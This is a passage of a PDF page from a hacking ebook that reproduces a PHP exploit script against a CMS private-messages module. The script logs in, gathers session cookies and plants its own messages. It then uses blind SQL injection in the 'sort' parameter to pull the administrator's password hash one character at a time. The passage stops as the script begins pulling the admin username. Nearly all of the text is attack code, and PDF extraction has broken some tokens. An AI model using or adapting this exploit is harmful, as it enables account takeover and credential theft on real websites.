Hacker Professional Ebook part 389 pdf

Trang 1

while ((!feof($ock)) or

(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

fclose($ock);

#debug

#echo "\r\n".$html;

}

$host=$argv[1];

$path=$argv[2];

$uname=$argv[3];

$pass=$argv[4];

$prefix="exv2_";

$port=80;

$proxy="";

for ($i=5; $i<$argc; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

}

if ($temp=="-T")

{

$prefix=str_replace("-T","",$argv[$i]);

}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

//login

$data="uname=$uname&pass=$pass&op=login";

$packet ="POST ".$p."user.php HTTP/1.0\r\n";

$packet.="Content-Type: application/x-www-form-urlencoded\r\n";

Trang 2

$packet.="Accept-Encoding: text/plain\r\n";

$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Content-Length: ".strlen($data)."\r\n";

$packet.="Connection: Close\r\n\r\n";

$packet.=$data;

sendpacketii($packet);

$temp=explode("Set-Cookie: ",$html);

$cookie="";

for ($i=1; $i<count($temp); $i++)

{

$temp2=explode(" ",$temp[$i]);

$temp3=explode("\r",$temp2[0]);

if (!strstr($temp3[0],";")){$temp3[0]=$temp3[0].";";}

$cookie.=$temp3[0];

}

echo "cookie ->".$cookie."\n";

//retrieve your user id

$packet ="GET ".$p."edituser.php HTTP/1.0\r\n";

$packet.="Cookie: ".$cookie."\r\n";

$temp=explode("userinfo.php?uid=",$html);

$temp2=explode("'",$temp[1]);

$uid=(int)$temp2[0];

echo "uid -> ".$uid."\n";

//configure your message box, needed

$data ="msg_mail=0";

$data.="&msg_showdisc=0";

$data.="&msg_showsend=0";

$data.="&update=0";

$data.="&op=config_save";

Trang 3

$data.="&submit=Save";

$packet ="POST ".$p."modules/messages/conf.php HTTP/1.0\r\n";

$packet.="Content-Type: application/x-www-form-urlencoded\r\n";

$packet.=$data;

sleep(1);

//send to yourself some messages

for ($i=2; $i>=1; $i )

{

$data=' -7d626f251b00fa

Content-Disposition: form-data; name="to_userid"

'.$uid.'

-7d626f251b00fa

Content-Disposition: form-data; name="subject"

11111111111111111111111'.$i.'

-7d626f251b00fa

Content-Disposition: form-data; name="message"

11111111111111111111111

-7d626f251b00fa

Content-Disposition: form-data; name="MAX_FILE_SIZE"

256000

-7d626f251b00fa

Content-Disposition: form-data; name="msg_attachment"; filename=""

-7d626f251b00fa

Content-Disposition: form-data; name="msg_attachment[max_file_size]"

Trang 4

256000

-7d626f251b00fa

Content-Disposition: form-data; name="msg_attachment[accepted]"

-7d626f251b00fa

Content-Disposition: form-data; name="allow_html"

1

-7d626f251b00fa

Content-Disposition: form-data; name="allow_smileys"

1

-7d626f251b00fa

Content-Disposition: form-data; name="allow_bbcode"

1

-7d626f251b00fa

Content-Disposition: form-data; name="submit"

Envoyer

-7d626f251b00fa

';

$packet="POST ".$p."modules/messages/pmlite.php HTTP/1.0\r\n";

$packet.="Content-Type: multipart/form-data;

boundary= -7d626f251b00fa\r\n";

$packet.="Connection: Close\r\n";

$packet.="Cookie: $cookie\r\n\r\n";

$packet.=$data;

sleep(2);

}

Trang 5

//let's go

$md5s[0]=0;//null

$md5s=array_merge($md5s,range(48,57)); //numbers

$md5s=array_merge($md5s,range(97,102));//a-f letters

//print_r(array_values($md5s));

$j=1;

$my_password="";

while (!strstr($my_password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$md5s))

{

$sql="(SELECT(IF((ASCII(SUBSTRING(pass,$j,1))=".$i."),msg_time,subject))F ROM/**/".$prefix."users/**/WHERE/**/rank=7/**/and/**/level=5)/**/ASC/**/L IMIT/**/1/*";

echo "sql -> ".$sql."\r\n";

$sql=urlencode($sql);

$packet ="GET ".$p."modules/messages/index.php?sort=$sql&by=suntzu

HTTP/1.0\r\n";

if

(!strstr($html,"111111111111111111111111")){$my_password.=chr($i);echo

"password -> ".$my_password."[???]\n";sleep(1);break;}

}

if ($i==255) {die("Exploit failed ");}

}

$j++;

}

$j=1;

$my_admin="";

while (!strstr($my_admin,chr(0)))

Định dạng
Số trang	6
Dung lượng	18,35 KB